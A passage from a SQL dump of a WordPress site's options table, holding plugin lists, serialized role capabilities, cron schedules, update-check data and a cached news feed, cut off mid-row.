(33,'active_plugins','a:13:{i:0;s:49:\"add-new-default-avatar/kl_addnewdefaultavatar.php\";i:1;s:30:\"advanced-custom-fields/acf.php\";i:3;s:19:\"bbpress/bbpress.php\";i:4;s:49:\"buddypress-auto-group-join/bp-auto-group-join.php\";i:5;s:26:\"buddypress-docs/loader.php\";i:6;s:64:\"buddypress-group-email-subscription/bp-activity-subscription.php\";i:7;s:24:\"buddypress/bp-loader.php\";i:8;s:33:\"events-manager/events-manager.php\";i:9;s:31:\"invite-anyone/invite-anyone.php\";i:10;s:19:\"members/members.php\";i:11;s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";i:12;s:39:\"search-everything/search-everything.php\";i:15;s:25:\"wp-better-emails/wpbe.php\";}','yes'),
(34,'category_base','','yes'),
(35,'ping_sites','http://rpc.pingomatic.com/','yes'),
(36,'advanced_edit','0','yes'),
(37,'comment_max_links','2','yes'),
(38,'gmt_offset','0','yes'),
(39,'default_email_category','1','yes'),
(40,'recently_edited','','no'),
(41,'template','commons','yes'),
(42,'stylesheet','commons','yes'),
(43,'comment_whitelist','1','yes'),
(44,'blacklist_keys','','no'),
(45,'comment_registration','0','yes'),
(46,'html_type','text/html','yes'),
(47,'use_trackback','0','yes'),
(48,'default_role','subscriber','yes'),
(49,'db_version','30133','yes'),
(50,'uploads_use_yearmonth_folders','1','yes'),
(51,'upload_path','','yes'),
(52,'blog_public','0','yes'),
(53,'default_link_category','2','yes'),
(54,'show_on_front','page','yes'),
(55,'tag_base','','yes'),
(56,'show_avatars','1','yes'),
(57,'avatar_rating','G','yes'),
(58,'upload_url_path','','yes'),
(59,'thumbnail_size_w','150','yes'),
(60,'thumbnail_size_h','150','yes'),
(61,'thumbnail_crop','1','yes'),
(62,'medium_size_w','300','yes'),
(63,'medium_size_h','300','yes'),
(64,'avatar_default','mystery','yes'),
(65,'large_size_w','1024','yes'),
(66,'large_size_h','1024','yes'),
(67,'image_default_link_type','file','yes'),
(68,'image_default_size','','yes'),
(69,'image_default_align','','yes'),
(70,'close_comments_for_old_posts','0','yes'),
(71,'close_comments_days_old','14','yes'),
(72,'thread_comments','1','yes'),
(73,'thread_comments_depth','5','yes'),
(74,'page_comments','0','yes'),
(75,'comments_per_page','50','yes'),
(76,'default_comments_page','newest','yes'),
(77,'comment_order','asc','yes'),
(78,'sticky_posts','a:0:{}','yes'),
(79,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(80,'widget_text','a:0:{}','yes'),
(81,'widget_rss','a:0:{}','yes'),
(82,'uninstall_plugins','a:0:{}','no'),
(83,'timezone_string','','yes'),
(84,'page_for_posts','18','yes'),
(85,'page_on_front','39','yes'),
(86,'default_post_format','0','yes'),
(87,'link_manager_enabled','0','yes'),
(88,'initial_db_version','30133','yes'),
(89,'wp_user_roles','a:10:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:90:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:10:\"list_roles\";b:1;s:12:\"create_roles\";b:1;s:12:\"delete_roles\";b:1;s:10:\"edit_roles\";b:1;s:16:\"restrict_content\";b:1;s:14:\"publish_events\";b:1;s:20:\"delete_others_events\";b:1;s:18:\"edit_others_events\";b:1;s:22:\"manage_others_bookings\";b:1;s:24:\"publish_recurring_events\";b:1;s:30:\"delete_others_recurring_events\";b:1;s:28:\"edit_others_recurring_events\";b:1;s:17:\"publish_locations\";b:1;s:23:\"delete_others_locations\";b:1;s:16:\"delete_locations\";b:1;s:21:\"edit_others_locations\";b:1;s:23:\"delete_event_categories\";b:1;s:21:\"edit_event_categories\";b:1;s:15:\"manage_bookings\";b:1;s:19:\"upload_event_images\";b:1;s:13:\"delete_events\";b:1;s:11:\"edit_events\";b:1;s:19:\"read_private_events\";b:1;s:23:\"delete_recurring_events\";b:1;s:21:\"edit_recurring_events\";b:1;s:14:\"edit_locations\";b:1;s:22:\"read_private_locations\";b:1;s:21:\"read_others_locations\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:57:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:14:\"publish_events\";b:1;s:20:\"delete_others_events\";b:1;s:18:\"edit_others_events\";b:1;s:22:\"manage_others_bookings\";b:1;s:24:\"publish_recurring_events\";b:1;s:30:\"delete_others_recurring_events\";b:1;s:28:\"edit_others_recurring_events\";b:1;s:17:\"publish_locations\";b:1;s:23:\"delete_others_locations\";b:1;s:16:\"delete_locations\";b:1;s:21:\"edit_others_locations\";b:1;s:23:\"delete_event_categories\";b:1;s:21:\"edit_event_categories\";b:1;s:15:\"manage_bookings\";b:1;s:19:\"upload_event_images\";b:1;s:13:\"delete_events\";b:1;s:11:\"edit_events\";b:1;s:19:\"read_private_events\";b:1;s:23:\"delete_recurring_events\";b:1;s:21:\"edit_recurring_events\";b:1;s:14:\"edit_locations\";b:1;s:22:\"read_private_locations\";b:1;s:21:\"read_others_locations\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:20:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:15:\"manage_bookings\";b:1;s:19:\"upload_event_images\";b:1;s:13:\"delete_events\";b:1;s:11:\"edit_events\";b:1;s:19:\"read_private_events\";b:1;s:23:\"delete_recurring_events\";b:1;s:21:\"edit_recurring_events\";b:1;s:14:\"edit_locations\";b:1;s:22:\"read_private_locations\";b:1;s:21:\"read_others_locations\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:15:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:15:\"manage_bookings\";b:1;s:19:\"upload_event_images\";b:1;s:13:\"delete_events\";b:1;s:11:\"edit_events\";b:1;s:19:\"read_private_events\";b:1;s:23:\"delete_recurring_events\";b:1;s:21:\"edit_recurring_events\";b:1;s:14:\"edit_locations\";b:1;s:22:\"read_private_locations\";b:1;s:21:\"read_others_locations\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:12:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;s:15:\"manage_bookings\";b:1;s:19:\"upload_event_images\";b:1;s:13:\"delete_events\";b:1;s:11:\"edit_events\";b:1;s:19:\"read_private_events\";b:1;s:23:\"delete_recurring_events\";b:1;s:21:\"edit_recurring_events\";b:1;s:14:\"edit_locations\";b:1;s:22:\"read_private_locations\";b:1;s:21:\"read_others_locations\";b:1;}}s:13:\"bbp_keymaster\";a:2:{s:4:\"name\";s:9:\"Keymaster\";s:12:\"capabilities\";a:29:{s:9:\"keep_gate\";b:1;s:8:\"spectate\";b:1;s:11:\"participate\";b:1;s:8:\"moderate\";b:1;s:8:\"throttle\";b:1;s:10:\"view_trash\";b:1;s:14:\"publish_forums\";b:1;s:11:\"edit_forums\";b:1;s:18:\"edit_others_forums\";b:1;s:13:\"delete_forums\";b:1;s:20:\"delete_others_forums\";b:1;s:19:\"read_private_forums\";b:1;s:18:\"read_hidden_forums\";b:1;s:14:\"publish_topics\";b:1;s:11:\"edit_topics\";b:1;s:18:\"edit_others_topics\";b:1;s:13:\"delete_topics\";b:1;s:20:\"delete_others_topics\";b:1;s:19:\"read_private_topics\";b:1;s:15:\"publish_replies\";b:1;s:12:\"edit_replies\";b:1;s:19:\"edit_others_replies\";b:1;s:14:\"delete_replies\";b:1;s:21:\"delete_others_replies\";b:1;s:20:\"read_private_replies\";b:1;s:17:\"manage_topic_tags\";b:1;s:15:\"edit_topic_tags\";b:1;s:17:\"delete_topic_tags\";b:1;s:17:\"assign_topic_tags\";b:1;}}s:13:\"bbp_spectator\";a:2:{s:4:\"name\";s:9:\"Spectator\";s:12:\"capabilities\";a:1:{s:8:\"spectate\";b:1;}}s:11:\"bbp_blocked\";a:2:{s:4:\"name\";s:7:\"Blocked\";s:12:\"capabilities\";a:28:{s:8:\"spectate\";b:0;s:11:\"participate\";b:0;s:8:\"moderate\";b:0;s:8:\"throttle\";b:0;s:10:\"view_trash\";b:0;s:14:\"publish_forums\";b:0;s:11:\"edit_forums\";b:0;s:18:\"edit_others_forums\";b:0;s:13:\"delete_forums\";b:0;s:20:\"delete_others_forums\";b:0;s:19:\"read_private_forums\";b:0;s:18:\"read_hidden_forums\";b:0;s:14:\"publish_topics\";b:0;s:11:\"edit_topics\";b:0;s:18:\"edit_others_topics\";b:0;s:13:\"delete_topics\";b:0;s:20:\"delete_others_topics\";b:0;s:19:\"read_private_topics\";b:0;s:15:\"publish_replies\";b:0;s:12:\"edit_replies\";b:0;s:19:\"edit_others_replies\";b:0;s:14:\"delete_replies\";b:0;s:21:\"delete_others_replies\";b:0;s:20:\"read_private_replies\";b:0;s:17:\"manage_topic_tags\";b:0;s:15:\"edit_topic_tags\";b:0;s:17:\"delete_topic_tags\";b:0;s:17:\"assign_topic_tags\";b:0;}}s:13:\"bbp_moderator\";a:2:{s:4:\"name\";s:9:\"Moderator\";s:12:\"capabilities\";a:25:{s:8:\"spectate\";b:1;s:11:\"participate\";b:1;s:8:\"moderate\";b:1;s:8:\"throttle\";b:1;s:10:\"view_trash\";b:1;s:14:\"publish_forums\";b:1;s:11:\"edit_forums\";b:1;s:19:\"read_private_forums\";b:1;s:18:\"read_hidden_forums\";b:1;s:14:\"publish_topics\";b:1;s:11:\"edit_topics\";b:1;s:18:\"edit_others_topics\";b:1;s:13:\"delete_topics\";b:1;s:20:\"delete_others_topics\";b:1;s:19:\"read_private_topics\";b:1;s:15:\"publish_replies\";b:1;s:12:\"edit_replies\";b:1;s:19:\"edit_others_replies\";b:1;s:14:\"delete_replies\";b:1;s:21:\"delete_others_replies\";b:1;s:20:\"read_private_replies\";b:1;s:17:\"manage_topic_tags\";b:1;s:15:\"edit_topic_tags\";b:1;s:17:\"delete_topic_tags\";b:1;s:17:\"assign_topic_tags\";b:1;}}s:15:\"bbp_participant\";a:2:{s:4:\"name\";s:11:\"Participant\";s:12:\"capabilities\";a:8:{s:8:\"spectate\";b:1;s:11:\"participate\";b:1;s:19:\"read_private_forums\";b:1;s:14:\"publish_topics\";b:1;s:11:\"edit_topics\";b:1;s:15:\"publish_replies\";b:1;s:12:\"edit_replies\";b:1;s:17:\"assign_topic_tags\";b:1;}}}','yes'),
(90,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(91,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(92,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(93,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(94,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(95,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:8:\"sidebar1\";a:1:{i:0;s:11:\"em_widget-2\";}s:14:\"public_sidebar\";a:0:{}s:13:\"array_version\";i:3;}','yes'),
(96,'cron','a:17:{i:1424120851;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1424120862;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1424121458;a:2:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1424121461;a:1:{s:16:\"wpm_update_stats\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1424121983;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1424128657;a:1:{s:27:\"pb_backupbuddy_housekeeping\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1424149200;a:1:{s:16:\"ass_digest_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1424158680;a:1:{s:20:\"wp_maybe_auto_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1424189635;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1424276558;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1424322000;a:1:{s:23:\"ass_digest_event_weekly\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1424362487;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1424448126;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1424536146;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1424623675;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1424710085;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}s:7:\"version\";i:2;}','yes'),
(97,'_transient_doing_cron','1426278689.9325060844421386718750','yes'),
(98,'_transient_random_seed','92a3f5f47883679a91da6385962afa94','yes'),
(99,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1426278613;s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:13:{s:49:\"add-new-default-avatar/kl_addnewdefaultavatar.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"15331\";s:4:\"slug\";s:22:\"add-new-default-avatar\";s:6:\"plugin\";s:49:\"add-new-default-avatar/kl_addnewdefaultavatar.php\";s:11:\"new_version\";s:5:\"1.3.1\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/add-new-default-avatar/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/add-new-default-avatar.1.3.1.zip\";}s:30:\"advanced-custom-fields/acf.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"21367\";s:4:\"slug\";s:22:\"advanced-custom-fields\";s:6:\"plugin\";s:30:\"advanced-custom-fields/acf.php\";s:11:\"new_version\";s:5:\"4.4.0\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/advanced-custom-fields/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/advanced-custom-fields.zip\";}s:19:\"bbpress/bbpress.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"11780\";s:4:\"slug\";s:7:\"bbpress\";s:6:\"plugin\";s:19:\"bbpress/bbpress.php\";s:11:\"new_version\";s:5:\"2.5.5\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/bbpress/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/bbpress.2.5.5.zip\";}s:24:\"buddypress/bp-loader.php\";O:8:\"stdClass\":7:{s:2:\"id\";s:4:\"7756\";s:4:\"slug\";s:10:\"buddypress\";s:6:\"plugin\";s:24:\"buddypress/bp-loader.php\";s:11:\"new_version\";s:5:\"2.2.1\";s:14:\"upgrade_notice\";s:57:\"See: https://codex.buddypress.org/releases/version-2-2-1/\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/buddypress/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/buddypress.2.2.1.zip\";}s:49:\"buddypress-auto-group-join/bp-auto-group-join.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"14781\";s:4:\"slug\";s:26:\"buddypress-auto-group-join\";s:6:\"plugin\";s:49:\"buddypress-auto-group-join/bp-auto-group-join.php\";s:11:\"new_version\";s:5:\"2.2.1\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/buddypress-auto-group-join/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/buddypress-auto-group-join.2.2.1.zip\";}s:26:\"buddypress-docs/loader.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"20975\";s:4:\"slug\";s:15:\"buddypress-docs\";s:6:\"plugin\";s:26:\"buddypress-docs/loader.php\";s:11:\"new_version\";s:5:\"1.8.5\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/buddypress-docs/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/buddypress-docs.1.8.5.zip\";}s:64:\"buddypress-group-email-subscription/bp-activity-subscription.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"13692\";s:4:\"slug\";s:35:\"buddypress-group-email-subscription\";s:6:\"plugin\";s:64:\"buddypress-group-email-subscription/bp-activity-subscription.php\";s:11:\"new_version\";s:5:\"3.5.1\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/buddypress-group-email-subscription/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/buddypress-group-email-subscription.3.5.1.zip\";}s:33:\"events-manager/events-manager.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"4075\";s:4:\"slug\";s:14:\"events-manager\";s:6:\"plugin\";s:33:\"events-manager/events-manager.php\";s:11:\"new_version\";s:5:\"5.5.5\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/events-manager/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/events-manager.zip\";}s:31:\"invite-anyone/invite-anyone.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"11875\";s:4:\"slug\";s:13:\"invite-anyone\";s:6:\"plugin\";s:31:\"invite-anyone/invite-anyone.php\";s:11:\"new_version\";s:5:\"1.3.7\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/invite-anyone/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/invite-anyone.1.3.7.zip\";}s:19:\"members/members.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"10325\";s:4:\"slug\";s:7:\"members\";s:6:\"plugin\";s:19:\"members/members.php\";s:11:\"new_version\";s:5:\"0.2.4\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/members/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/members.0.2.4.zip\";}s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"25732\";s:4:\"slug\";s:38:\"remove-dashboard-access-for-non-admins\";s:6:\"plugin\";s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";s:11:\"new_version\";s:5:\"1.1.2\";s:3:\"url\";s:69:\"https://wordpress.org/plugins/remove-dashboard-access-for-non-admins/\";s:7:\"package\";s:87:\"https://downloads.wordpress.org/plugin/remove-dashboard-access-for-non-admins.1.1.2.zip\";}s:39:\"search-everything/search-everything.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"269\";s:4:\"slug\";s:17:\"search-everything\";s:6:\"plugin\";s:39:\"search-everything/search-everything.php\";s:11:\"new_version\";s:5:\"8.1.3\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/search-everything/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/search-everything.8.1.3.zip\";}s:25:\"wp-better-emails/wpbe.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"19049\";s:4:\"slug\";s:16:\"wp-better-emails\";s:6:\"plugin\";s:25:\"wp-better-emails/wpbe.php\";s:11:\"new_version\";s:5:\"0.2.8\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/wp-better-emails/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/wp-better-emails.0.2.8.zip\";}}}','yes'),
(102,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1426278613;s:7:\"checked\";a:2:{s:7:\"commons\";s:3:\"1.0\";s:13:\"twentyfifteen\";s:3:\"1.0\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}','yes'),
(103,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.1.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.1.1\";s:7:\"version\";s:5:\"4.1.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1426278613;s:15:\"version_checked\";s:5:\"4.1.1\";s:12:\"translations\";a:0:{}}','yes'),
(104,'_site_transient_timeout_browser_b07ac3be77f9031e8f7fe4cd2bfd43e4','1424725663','yes'),
(105,'_site_transient_browser_b07ac3be77f9031e8f7fe4cd2bfd43e4','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"35.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),
(106,'can_compress_scripts','1','yes'),
(107,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1424164064','no'),
(108,'_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 18:57:51 